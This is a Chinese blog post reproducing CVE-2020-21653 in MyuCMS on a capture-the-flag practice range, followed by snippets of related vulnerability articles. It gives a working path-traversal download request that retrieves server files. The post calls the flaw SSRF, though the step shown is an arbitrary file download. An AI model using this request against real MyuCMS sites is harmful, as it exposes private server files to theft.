[漏洞复现]MyuCMS后台ssrf(CVE-2020-21653)

最新推荐文章于 2024-11-18 10:50:29 发布
最新推荐文章于 2024-11-18 10:50:29 发布
阅读量787 收藏 8
点赞数 8
分类专栏: 漏洞复现 春秋云境靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/k5664524/article/details/135572511
版权

一、漏洞情况分析

MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展 其2.2版本中admin.php/index/sj方法存在SSRF漏洞, 可造成任意文件读取.

二、漏洞复现

春秋云境.com

进入靶场

开始复现

/index.php/bbs/index/download?url=../../../../../flag&local=1&name

直接在url后面接上上面的路径

它就会自动下载flag文件打开即可

三、漏洞处置建议 

把靶场关了,跟漏洞说“白白”

elestio memos SSRF漏洞复现CVE-2025-22952)(附脚本)
iSee857的博客
04-11 148
eleestio/memos:latest 和 neosmemo/memos:latest 都存在 SSRF 漏洞,攻击者可以访问内网 IP 地址和协议。尽管努力将访问协议限制为 HTTP 和 HTTPS,但攻击者仍然可以访问 localhost 上运行的其他端口。此漏洞使攻击者能够访问内部网络上的任何资产、嗅探内部网络上的 Web 服务、扫描内部网络上的主机,并可能访问薄弱的内部端点。(CVE-2025-22952)
WordPress AutomaticPlugin SSRF漏洞复现(CVE-2024-27954)
0xSec
03-31 811
WordPress AutomaticPlugin 其插件wp_automatic易受未经验证的任意文件下载和SSRF的攻击。位于downloader.php文件中,可能允许攻击者从网站下载任何文件。敏感数据,包括登录凭据和备份文件等。
MyuCMS社区+商城内容管理系统
06-01
MyuCMS社区+商城内容管理系统
CVE-2020-21653(春秋云境 )
qq_61155646的博客
04-19 348
账号:admin 密码:admin 口令:123456。
复现myucms v2.1.1022漏洞
p_utao的博客
08-19 2051
myucms漏洞复现
myucms后门
wangyuan8378的博客
09-23 194
myucms后门
【代码审计】YUNUCMS_v1.0.6 后台代码执行漏洞分析
12-03 1422
  0x00 环境准备 QYKCMS官网:http://www.yunucms.com 网站源码版本:YUNUCMSv1.0.6 程序源码下载:http://www.yunucms.com/Download/index.html 测试网站首页:   0x01 代码分析 1、漏洞文件位置:/app/admin/controller/System.php   第8-24行: publ...
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
XStream是一个常用的Java对象和XML相互转换的工具。...攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
Rebuild企业管理系统 SSRF漏洞复现(CVE-2024-1021)
0xSec
02-08 832
Rebuild 3.5.5 版本存在安全漏洞,该漏洞源于组件 HTTP Request Handler 的 readRawText 函数的 url 参数存在服务器端请求伪造漏洞
Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)
0xSec
09-06 1371
2024年9月,互联网上披露了Apache OFBiz 远程代码执行漏洞(CVE-2024-45195),该漏洞允许未经身份验证的远程攻击者通过SSRF漏洞控制请求从而写入恶意文件。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
MYUCMS企业官网系统
08-14
MYUCMS企业官网系统是thinkphp开发的专门为企业设定的一款智能自定义系统,全方位后台一键控制,小到各个图片文字,使用非常方便。后台ui整洁,使用简单大气,是一款非常强大企业官网系统。前端采用响应式设计适合任何屏幕的手机展示。MYUCMS企业官网系统基本功能介绍:1、分类管理,可随意添加多分类完全的自定义,展示的位置等等。2、文章管理,添加编辑删除,附件等,完全是为了公司提供资料下载。3、
MyuCMS社区+商城内容管理系统-PHP
06-21
MyuCMS开源内容管理系统采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展。 社区系统 这次社区系统全面改版预留不少钩子从此告别找添加钩子的烦恼。 添加板块可设置一级二级板块,这次增加了一个可见板块你可以设置哪个板块别人不能访问,可以设置能访问该版块的用户uid。 可以设置某个板块显示瀑布流样式默认论坛列表。 后台帖子管理评论管理不做介绍。 商城系统 可以二级分类 后台添加商品可以选择虚拟订单和实物订单。 虚拟订单一般就是附件为主要付费积分后方可下载。 必须付费积分后后台返回下载地址的数据 不用担心安全问题。 想要二次下载必须重新下单购买。 下载后才可以评论该商品。 实物订单需要加入购物车购买支付积分 然后后台确定发货 然后前台确定收货、评价,后台对该评价做出回复。 前台购买之前要添加收货地址方可下载附件或者付费购买实物。 会员系统  这次添加了邮箱登录和UID登录两种方式 后台可以设置登录注册发帖回帖等积分操作功能。 广告管理 广告这次增加了显示到期时间让我们从此告别手动取消广告显示的烦恼。 导航链接 配置了商城导航 社区导航 商城友联 社区友联的操作。 网站配置 这次的亮点就是可以添加自定义全局变量 后台添加变量 前台调用 和后端控制器调用。 目前配置了单行输入框 附件上传 单选框 普通文本边框框等4个选项的全局变量。 可设置隐藏板块的id 可查看隐藏板块的用户 留空或者填写0标识不生效。 可自定义任意页面为首页 配置附件上传到七牛。 bbs首页是否设置显示为瀑布流。 网站调试开启关闭。 发帖审核。 编辑器复制内容是否粘贴过滤。 可关闭论坛状态 。 可关闭商城状态(两个不能同时关闭)。 然后就是前端商城和社区的全局控制css代码 告别修改css升级困难。 插件管理  在线插件下载。 模板管理 在线模板下载。 介绍下功能 支持在线一键升级 在线下载插件 在线下载模板等操作 MyuCMS社区+商城内容管理系统 v2.2 更新日志: 上次发布文件sql缺失导致会报错 集成QQ登录  在任意页面点击登录 返回当前页面 完美解决关于有人说跳转到http://xxx.xxx.xxx/bbs是二级目录问题 添加搜索可搜索关键词 帖子详情页添加keywords标签 管理员可前台编辑用户帖子 收藏功能 消息通知 前台删除帖子 二级回帖 修复前台存在任意文件下载漏 洞的情况 新增手机版搜索样式 新增上一主题下一主题 新增删除分类时候该分类存在主题无法删除 修复CNVD国家漏洞库提供的多处漏洞 感谢他们的测试使得程序越来越安全 添加版主功能  可以设置超级版主 全部板块帖子可编辑删除加精置顶评论删除等操作 可以设置分板设置版主  版主权限帖子可编辑 删除 加精 置顶 评论删除 等操作 美化默认模板幻灯片样式 还有就是css样式修改模板的请自行备份 建议大家不要修改默认的css可在全局  或者新建css样式等操作  修改默认编辑器上传图片大小的问题 附件默认50M 编辑器图片默认5M 修复后台修改主题存在一些不安全 增加后台执行sql进行过滤操作 添加全局万能标签标签 forum表示字段8表示数量id表示排序10表示上级id 修复消息中心过滤不严格问题 修复商城首页原价和现价对换问题 添加订单入口
MyuCMS社区+商城内容管理系统 v2.2
08-23
社区系统 这次社区系统全面改版预留不少钩子从此告别找添加钩子的烦恼 添加板块可设置一级二级板块 这次增加了一个可见板块你可以设置哪个板块别人不能访问 可以设置能访问该版
MYUCMS企业官网系统 v1.2
08-13
为您提供MYUCMS企业官网系统下载,MYUCMS企业官网系统是thinkphp开发的专门为企业设定的一款智能自定义系统,全方位后台一键控制,小到各个图片文字,使用非常方便。后台ui整洁,使用简单大气,是一款非常强大企业官网系统。前端采用响应式设计适合任何屏幕的手机展示。MYUCMS企业官网系统基本功能介绍:1、分类管理,可随意添加多分类完全的自定义,展示的位置等等。2、文章管理,添加编辑删除,附件等,完全是为了公司提供资料下载。3、
【代码审计】YUNUCMS_v1.0.6 前台反射型XSS跨站脚本漏洞分析
12-03 667
  0x00 环境准备 QYKCMS官网:http://www.yunucms.com 网站源码版本:YUNUCMSv1.0.6 程序源码下载:http://www.yunucms.com/Download/index.html 测试网站首页:   0x01 代码分析 1、漏洞文件位置:/app/index/controller/Tag.php  第1-12行: &...
Arbitrary File Download Vulnerability in MyuCMS
Yale的博客
03-16 905
The point of vulnerability is: application/bbs/controller/Index.php The key code in the figure is for file download follow in "download",which in extend/org/Http.php There are no prote...
UCMS文件上传漏洞(CVE-2020-25483)
小小猪的博客
12-31 2495
UCMS文件上传漏洞(CVE-2020-25483) 漏洞简介: UCMS v1.4.8版本存在安全漏洞,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问服务器 影响版本: UCMS v1.4.8 环境搭建: 官网 地址下载源码,安装步骤自行安装 漏洞复现: 访问后台登录界面 找到文件修改,点击新增 burp进行抓包 构造poc POST /ucms/index.php?do=sadmin_fileedit&am...
YZMCMS V5.3后台SSRF漏洞以及代码审计详解
最新发布
2201_75489354的博客
11-18 509
作用是将$articleurl交给get_content处理,也就是交给crul_exec()处理,此时 $article 的值就是 crul_exec() 获取到的url内容。又将$content交给get_sub_content处理后重新赋值给$content。$url_start和$url_end,区域开始和区域结束不能为设置的值。$url_contain和$url_except依次判断是否满足要求。再发现$url交给get_content去处理并付给concent。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值